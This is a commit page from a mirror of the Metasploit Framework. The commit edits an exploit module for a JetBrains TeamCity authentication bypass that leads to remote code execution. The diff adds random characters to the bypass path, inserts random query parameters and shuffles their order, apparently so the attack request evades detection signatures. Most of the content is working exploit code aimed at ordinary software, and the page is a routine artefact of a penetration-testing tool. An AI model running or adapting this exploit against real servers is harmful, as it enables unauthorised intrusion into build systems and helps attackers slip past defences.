dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

we can shuffle thequery params so teh jsp param is not first. we can optionally add soem charachters before the trailing .jsp

This commit is contained in:
sfewer-r7 2024-02-29 09:13:44 +00:00
parent b7200b52e1
commit f0ca5c10dc
No known key found for this signature in database
1 changed files with 14 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
modules/exploits/multi/http/jetbrains_teamcity_rce_0day.rb
View File

@ -93,10 +93,22 @@ class MetasploitModule < Msf::Exploit::Remote
# This is the authentication bypass vulnerability, allowing any authenticated endpoint to be access unauthenticated.
def send_auth_bypass_request_cgi(opts = {})
opts['vars_get'] = {
'jsp' => "#{opts['uri']};.jsp"
# The file name of the .jsp can be 0 or more characters (it just has to end in .jsp)
vars_get = {
'jsp' => "#{opts['uri']};#{Rex::Text.rand_text_alphanumeric(rand(8))}.jsp"
}
# Add in 0 or more random query parameters, and ensure the order is shuffled in the request.
0.upto(rand(8)) do
vars_get[Rex::Text.rand_text_alphanumeric(rand(1..8))] = Rex::Text.rand_text_alphanumeric(rand(1..16))
end
opts['vars_get'] = {} unless opts.key? 'vars_get'
opts['vars_get'].merge!(vars_get)
opts['shuffle_get_params'] = true
opts['uri'] = normalize_uri(target_uri.path, Rex::Text.rand_text_alphanumeric(8))
send_request_cgi(opts)